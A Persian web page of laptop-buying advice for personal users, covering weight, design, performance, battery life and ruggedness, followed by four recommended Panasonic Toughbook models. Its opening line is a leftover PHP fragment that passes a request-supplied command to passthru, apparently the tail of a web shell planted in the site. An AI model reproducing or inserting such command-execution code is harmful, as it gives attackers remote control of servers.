'; passthru($cmd); echo ''; exit(); } ?>
You are here: personal


 

مصرف کننده شخصی لپ تاپ باید در جستجوی گزینه دلخواه اش موارد زیر را در نظر بگیرد:

 

1. سبکی: یادتان باشد که این وسیله را باید تا آخر روی کولتان از اینجا به آنجا بکشید. وزن لپ تاپ را حتما در انتخابتان لحاظ کنید.

2. زیبایی: زیبایی و ظرافت در طراحی ظاهری بیشتر از آن چیزی که فکر می کنید روی رضایت شما پس از خرید تاثیر می گذارد.

3.  کارایی: بازار کامپیوتر هر لحظه در حال تغییر و پیش رفت است، اگر امروز سریع ترین پردازنده را هم بخرید، ماه بعد تبدیل به یک پردازنده کاملا معمولی در بازار خواهد شد. بهتر است مصرف واقعی تان را در نظر بگیرید و بر اساس آن انتخاب کنید.

 

4. طول عمر باطری: هیچ چیز به اندازه زمانی که قصد ارائه یک مطلب در یک جلسه کاری باطری لپ تاپ تان تمام شود توی ذوق نمی زند. لپ تاپی انتخاب کنید که به اندازه نیاز شما بتواند بی نیاز از شارژ مجدد کار کنید.

 

5.  استحکام و مقاومت: لپ تاپ کالای ارزانی برای هیچ مصرف کننده شخصی محسوب نمی شود. اما از سوی دیگر ضربه خوردن لپ تاپ عزیزتر از جان که آن را با خود به اینجا و آنجا می بریم برای هر کسی پیش می آید. افتادن از روی میز، فشار ناشی از ازدهام در واگن مترو، ریختن یک لیوان آب روی صفحه کلید ... اجتناب ناپذیر است. استحکام و مقاوم بودن لپ تاپ خیالتان را از بروز این اتفقات روزمره آسوده می کند.

 

ما چهار مدل از محصولات Panasonic Toughbook را به شما پیشنهاد می کنیم. تمامی این مدل ها همه ویژگی های فوق را دارند. اما انتخاب نهایی لپ تاپ برای مصرف شخصی در نهایت از یک اصل تبعیت میکند: "سلیقه


لپ تاپ های پیشنهادی:


مدل ویژگی ها
مدل Toughbook-51 صفحه نمایش بزرگ ، کارایی بسیار بالا
مدل Toughbook-Y5 یک لپ تاپ خوش دست برای کسانی است که قدرت، ظرافت، استحکام و سبکی را به صورت همزمان می خواهند
مدل Toughbook-w5 دوست داشتنی ترین لپ تاپ Panasonic با هشت ساعت بی نیاز از شارژ مجدد و حدودا یک و نیم کیلو وزن
مدل Toughbook-T5 ظریف و زیبا، یک لپ تاپ قابل حمل واقعی